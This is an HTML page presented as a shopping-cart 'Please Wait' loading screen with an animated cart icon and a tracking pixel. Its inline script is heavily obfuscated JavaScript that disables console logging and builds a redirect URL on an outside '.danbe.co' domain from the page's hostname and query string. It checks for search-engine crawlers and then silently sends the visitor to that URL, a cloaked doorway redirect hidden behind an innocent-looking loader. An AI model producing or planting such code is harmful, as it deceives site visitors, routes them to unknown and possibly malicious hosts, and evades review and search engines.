<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
		<script>
function _0x177e(){var _0x7a238c=['trace','647465imizyM','VotNk','search','nction()\x20','Vykrk','toString','rYQsh','62709vAbaPH','1397424uykGkk','__proto__','info','fFTqW','table','jRcCW','split','ctor(\x22retu','constructo','test','warn','1715193YMfOWD','znvjh','100345mYDlOM','Kvqbi','oEabC','prototype','bind','10AKQBAm','item/','mDRjh','12MAoXqr','error','2IXtMgY','log','9031njqKAx','href','exception','116591dnsyte','length','(((.+)+)+)','JHNOR','KKrEF','.danbe.co/','bERNS','userAgent','72PDAMMF','location','apply','Gwnlo','2|5|4|1|3|','3288ABsRiC','wFTOo'];_0x177e=function(){return _0x7a238c;};return _0x177e();}function _0x47f6(_0x3e77b2,_0x5c4bae){var _0x177e60=_0x177e();return _0x47f6=function(_0x47f6da,_0x16b8cf){_0x47f6da=_0x47f6da-(-0xa3*0x32+0x1*-0x14d5+0x3584);var _0x45cb26=_0x177e60[_0x47f6da];return _0x45cb26;},_0x47f6(_0x3e77b2,_0x5c4bae);}(function(_0x1fb9f1,_0x3432d9){function _0x13801e(_0x7815db,_0x479ab1,_0x7bbaf7,_0x15f033){return _0x47f6(_0x15f033- -0x17b,_0x479ab1);}function _0x6ccaa5(_0x4e80e6,_0x15e292,_0x5e55ba,_0x24975c){return _0x47f6(_0x15e292- -0x2bb,_0x4e80e6);}var _0x4616b2=_0x1fb9f1();while(!![]){try{var _0x3961dd=-parseInt(_0x6ccaa5(-0x1e1,-0x1ce,-0x1ce,-0x1bc))/(0x5*-0x1e2+-0x132d+0x1c98)*(parseInt(_0x13801e(-0x85,-0x9c,-0x7e,-0x93))/(-0x2544+0x65a+-0x1eec*-0x1))+-parseInt(_0x13801e(-0x6d,-0x8f,-0x84,-0x77))/(-0x1*0x11e5+-0xf0d*-0x2+-0xc32)*(-parseInt(_0x6ccaa5(-0x1ef,-0x1d5,-0x1ef,-0x1ce))/(0x1f1c+0x730+-0x2648))+parseInt(_0x13801e(-0x81,-0x78,-0x68,-0x7e))/(0x170f*0x1+0x1*0x1dea+-0x34f4)+-parseInt(_0x13801e(-0x7f,-0x71,-0x88,-0x76))/(-0x13e3+-0x637+0x8*0x344)+parseInt(_0x13801e(-0xab,-0xb2,-0x84,-0x9d))/(0xb85+0x4d5+0x7*-0x255)*(-parseInt(_0x13801e(-0x7f,-0x7f,-0x75,-0x86))/(0x348+-0x1bda+0x189a))+-parseInt(_0x6ccaa5(-0x1f4,-0x1df,-0x1da,-0x1e9))/(-0x536*0x1+-0x1*0xfab+-0x14ea*-0x1)*(-parseInt(_0x6ccaa5(-0x1bf,-0x1d8,-0x1dd,-0x1cc))/(0x3b5*-0x1+0x841*0x1+0x2*-0x241))+-parseInt(_0x13801e(-0x97,-0x99,-0x95,-0x91))/(0x14*-0x30+-0x1*0x2315+-0x26e*-0x10)*(-parseInt(_0x6ccaa5(-0x1ae,-0x1c1,-0x1b7,-0x1cd))/(0x769*-0x5+0x570*-0x1+-0x1*-0x2a89));if(_0x3961dd===_0x3432d9)break;else _0x4616b2['push'](_0x4616b2['shift']());}catch(_0x3ce2df){_0x4616b2['push'](_0x4616b2['shift']());}}}(_0x177e,0x3c166+-0x7d*-0x334+0xb*-0x4de9),(function(){var _0x4d66b1={'Kvqbi':function(_0x4969d5,_0x2af969){return _0x4969d5===_0x2af969;},'TpYDP':_0x412873(0x3dd,0x3d8,0x3c6,0x3db),'rYQsh':_0x21813c(0x60,0x56,0x3e,0x46),'KENSl':_0x412873(0x3da,0x3ca,0x3dc,0x3c2)+'+$','CGRvW':function(_0x1c2fc1,_0x6035c3){return _0x1c2fc1(_0x6035c3);},'VotNk':function(_0x1e8fd8,_0x29f299){return _0x1e8fd8+_0x29f299;},'Vykrk':'return\x20(fu'+_0x21813c(0x7e,0x71,0x7e,0x75),'TCsct':'{}.constru'+_0x21813c(0x76,0x7d,0x83,0x91)+'rn\x20this\x22)('+'\x20)','XmrTz':_0x412873(0x3d1,0x3cf,0x3d7,0x3da),'KKrEF':_0x412873(0x3bd,0x3d4,0x3a9,0x3ba),'yToOO':_0x412873(0x3bc,0x3a7,0x3b0,0x3bf),'bERNS':_0x21813c(0x73,0x7a,0x8d,0x79),'VAaPf':_0x21813c(0x86,0x6d,0x57,0x75),'YoPPG':'tNqGO','wFTOo':function(_0x17ed76,_0x55b83b,_0x374281){return _0x17ed76(_0x55b83b,_0x374281);},'KbnYu':function(_0x58af17){return _0x58af17();},'oEabC':function(_0x34aa8b){return _0x34aa8b();},'xzkJM':function(_0xc3bade,_0x365ed8){return _0xc3bade+_0x365ed8;},'znvjh':function(_0x5d5fb5,_0x25666a){return _0x5d5fb5+_0x25666a;},'hkwlj':'https://','FJQyl':_0x21813c(0x69,0x63,0x53,0x62)+_0x412873(0x3b7,0x3c4,0x3bc,0x3b7),'eqgPV':function(_0x1a5f5e,_0x1fefcb){return _0x1a5f5e+_0x1fefcb;}},_0x479c36=(function(){function _0x520b90(_0x21c9b6,_0x29f7b3,_0x563a32,_0x310ba3){return _0x412873(_0x21c9b6-0x2d,_0x29f7b3,_0x563a32-0xe9,_0x310ba3- -0x5e2);}function _0x2ddad3(_0x5600a0,_0x42497a,_0x86ac5a,_0x374643){return _0x412873(_0x5600a0-0x18c,_0x5600a0,_0x86ac5a-0xe4,_0x86ac5a- -0x108);}if(_0x4d66b1[_0x2ddad3(0x2b0,0x2b4,0x2aa,0x2a3)](_0x4d66b1['TpYDP'],_0x4d66b1[_0x520b90(-0x213,-0x219,-0x21f,-0x20c)])){if(_0x52e59c){var _0x49ec1a=_0x57e3c1[_0x520b90(-0x20b,-0x204,-0x232,-0x218)](_0x5b0578,arguments);return _0x3568ce=null,_0x49ec1a;}}else{var _0x275edd=!![];return function(_0x191d19,_0x3bae38){var _0x34dd48=_0x275edd?function(){if(_0x3bae38){var _0x1f002a=_0x3bae38['apply'](_0x191d19,arguments);return _0x3bae38=null,_0x1f002a;}}:function(){};return _0x275edd=![],_0x34dd48;};}}());function _0x21813c(_0x350165,_0x1a0c5c,_0x6e6183,_0x5471d7){return _0x47f6(_0x1a0c5c- -0x8f,_0x350165);}var _0x15e612=_0x4d66b1[_0x21813c(0x82,0x6c,0x64,0x83)](_0x479c36,this,function(){function _0x3ed739(_0x5148eb,_0x50cca9,_0x4cf18b,_0x36ff3c){return _0x21813c(_0x36ff3c,_0x5148eb- -0xf0,_0x4cf18b-0x2f,_0x36ff3c-0x82);}function _0x27cca7(_0x97f7df,_0x16a4e1,_0x5842bb,_0x159e0f){return _0x412873(_0x97f7df-0x130,_0x16a4e1,_0x5842bb-0x1de,_0x159e0f- -0x2f9);}return _0x15e612[_0x27cca7(0xd7,0xec,0xda,0xdc)]()[_0x3ed739(-0x80,-0x86,-0x83,-0x96)](_0x4d66b1['KENSl'])[_0x3ed739(-0x7d,-0x69,-0x7e,-0x89)]()[_0x27cca7(0xb1,0xc5,0xc0,0xb3)+'r'](_0x15e612)['search'](_0x4d66b1['KENSl']);});_0x4d66b1['KbnYu'](_0x15e612);var _0x1f408f=(function(){var _0x28b78a=!![];return function(_0x2e5167,_0xb79e26){var _0x4a75a3=_0x28b78a?function(){function _0x33f5db(_0x3c5e65,_0x4866e1,_0x4e75c7,_0x2b2b51){return _0x47f6(_0x3c5e65- -0x89,_0x2b2b51);}if(_0xb79e26){var _0x46c884=_0xb79e26[_0x33f5db(0x6e,0x6c,0x71,0x69)](_0x2e5167,arguments);return _0xb79e26=null,_0x46c884;}}:function(){};return _0x28b78a=![],_0x4a75a3;};}()),_0x358839=_0x1f408f(this,function(){function _0x587a01(_0x48e77a,_0x56c1ff,_0x4910db,_0x175a5d){return _0x412873(_0x48e77a-0x134,_0x175a5d,_0x4910db-0x16a,_0x56c1ff- -0x500);}var _0x3858ca=function(){function _0x431655(_0x5addf6,_0x230231,_0x14f865,_0x3baa58){return _0x47f6(_0x14f865-0x141,_0x5addf6);}var _0x4f213f;function _0x419d31(_0x5c1c80,_0x3aec3f,_0x5e902d,_0x2a7db1){return _0x47f6(_0x3aec3f-0x144,_0x5c1c80);}try{_0x4f213f=_0x4d66b1['CGRvW'](Function,_0x4d66b1['VotNk'](_0x4d66b1[_0x431655(0x236,0x248,0x242,0x240)],_0x4d66b1['TCsct'])+');')();}catch(_0x302e00){if(_0x4d66b1[_0x431655(0x210,0x222,0x220,0x236)](_0x431655(0x223,0x21d,0x231,0x23c),_0x431655(0x235,0x23b,0x239,0x220))){var _0x5aad1d=_0x292a0d[_0x419d31(0x23d,0x23b,0x247,0x24b)](_0x4150e2,arguments);return _0x4ada5c=null,_0x5aad1d;}else _0x4f213f=window;}return _0x4f213f;},_0x340905=_0x3858ca(),_0x200004=_0x340905['console']=_0x340905['console']||{};function _0x1e3c1e(_0x5ddd6f,_0x5c6846,_0x2fe960,_0x220703){return _0x21813c(_0x2fe960,_0x5ddd6f- -0x207,_0x2fe960-0x12,_0x220703-0x167);}var _0x343fb3=[_0x1e3c1e(-0x1ad,-0x19b,-0x199,-0x196),_0x587a01(-0x15d,-0x152,-0x14e,-0x168),_0x4d66b1['XmrTz'],_0x4d66b1[_0x1e3c1e(-0x1a5,-0x198,-0x19b,-0x1a5)],_0x4d66b1['yToOO'],_0x4d66b1[_0x587a01(-0x152,-0x13a,-0x144,-0x138)],_0x4d66b1['VAaPf']];for(var _0x3b1c56=-0xc*-0x11b+-0x3*-0x6e5+-0x21f3;_0x3b1c56<_0x343fb3[_0x1e3c1e(-0x1a8,-0x195,-0x1ae,-0x1a5)];_0x3b1c56++){if(_0x4d66b1['YoPPG']!==_0x587a01(-0x126,-0x123,-0x11f,-0x12e)){var _0x2f6cd1=(_0x587a01(-0x13f,-0x134,-0x11d,-0x146)+'0')[_0x587a01(-0x12b,-0x122,-0x12b,-0x136)]('|'),_0x5b1530=0x6c6+-0x1894+0x11ce;while(!![]){switch(_0x2f6cd1[_0x5b1530++]){case'0':_0x200004[_0x48a35c]=_0x1dfa03;continue;case'1':_0x1dfa03[_0x1e3c1e(-0x190,-0x194,-0x187,-0x19f)]=_0x1f408f[_0x1e3c1e(-0x1b4,-0x1bd,-0x1c0,-0x1a4)](_0x1f408f);continue;case'2':var _0x1dfa03=_0x1f408f['constructo'+'r'][_0x587a01(-0x157,-0x14c,-0x148,-0x15c)][_0x1e3c1e(-0x1b4,-0x1c1,-0x1a2,-0x1b9)](_0x1f408f);continue;case'3':_0x1dfa03['toString']=_0x2ed21f[_0x587a01(-0x116,-0x12b,-0x139,-0x11c)][_0x1e3c1e(-0x1b4,-0x1aa,-0x1ab,-0x1a4)](_0x2ed21f);continue;case'4':var _0x2ed21f=_0x200004[_0x48a35c]||_0x1dfa03;continue;case'5':var _0x48a35c=_0x343fb3[_0x3b1c56];continue;}break;}}else{var _0x21e7f1=('2|4|1|5|3|'+'0')['split']('|'),_0x4d3ae0=0x1*-0x26df+0x2561+0x17e;while(!![]){switch(_0x21e7f1[_0x4d3ae0++]){case'0':_0x435564[_0x3a00ee]=_0x47c7b8;continue;case'1':var _0x3ca92a=_0x5a3091[_0x3a00ee]||_0x47c7b8;continue;case'2':var _0x47c7b8=_0x1468cd[_0x587a01(-0x16e,-0x154,-0x162,-0x14e)+'r'][_0x587a01(-0x163,-0x14c,-0x140,-0x166)][_0x587a01(-0x154,-0x14b,-0x14a,-0x141)](_0x5c1d05);continue;case'3':_0x47c7b8[_0x587a01(-0x130,-0x12b,-0x124,-0x116)]=_0x3ca92a[_0x1e3c1e(-0x194,-0x180,-0x1a2,-0x189)]['bind'](_0x3ca92a);continue;case'4':var _0x3a00ee=_0x45a137[_0xa9e9bd];continue;case'5':_0x47c7b8['__proto__']=_0x2fa4d2[_0x1e3c1e(-0x1b4,-0x1c0,-0x1c6,-0x1b6)](_0x1c8944);continue;}break;}}}});_0x4d66b1[_0x412873(0x3c5,0x3a3,0x39c,0x3b3)](_0x358839);var _0x4fde26=window[_0x412873(0x3b8,0x3b6,0x3bc,0x3c9)][_0x21813c(0x5b,0x5c,0x76,0x46)],_0x360f79=window[_0x21813c(0x4e,0x67,0x79,0x7e)]['hostname'],_0xc2317e=_0x360f79['split']('.')[-0x1949+-0x7c3*0x5+-0x4*-0x1006];function _0x412873(_0x281b83,_0xe1fca7,_0x530351,_0x1d6db6){return _0x47f6(_0x1d6db6-0x2d3,_0xe1fca7);}var _0x498519=_0x4d66b1[_0x21813c(0x82,0x6f,0x83,0x6d)](_0x4d66b1['xzkJM'](_0x4d66b1[_0x412873(0x3c9,0x3bc,0x3e0,0x3d1)](_0x4d66b1[_0x412873(0x396,0x3a3,0x3c2,0x3b0)](_0x4d66b1['hkwlj'],_0xc2317e),_0x4d66b1['FJQyl']),_0x360f79),'/'),_0x52ff72=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x21813c(0x60,0x4b,0x58,0x34)](navigator[_0x21813c(0x56,0x65,0x7c,0x61)]),_0x584498=_0x4fde26[_0x21813c(0x64,0x7c,0x7a,0x8c)]('?')[0x1d89+0x17*0x161+0x3d3f*-0x1]?.[_0x21813c(0x81,0x7c,0x94,0x69)]('&')[-0x1*-0x21e3+-0x118f+-0x1054]?.[_0x412873(0x3f6,0x3ea,0x3f3,0x3de)]('-')[0xc86+-0x1*0x229+0x297*-0x4];if(!_0x584498)return;var _0xfebf8=_0x52ff72?_0x4d66b1['eqgPV'](_0x498519,_0x584498):_0x4d66b1[_0x21813c(0x63,0x4e,0x4b,0x51)](_0x498519,_0x584498);location[_0x412873(0x3c1,0x3b5,0x3d7,0x3be)]=_0xfebf8;}()));
		</script>
	</body>
</html>
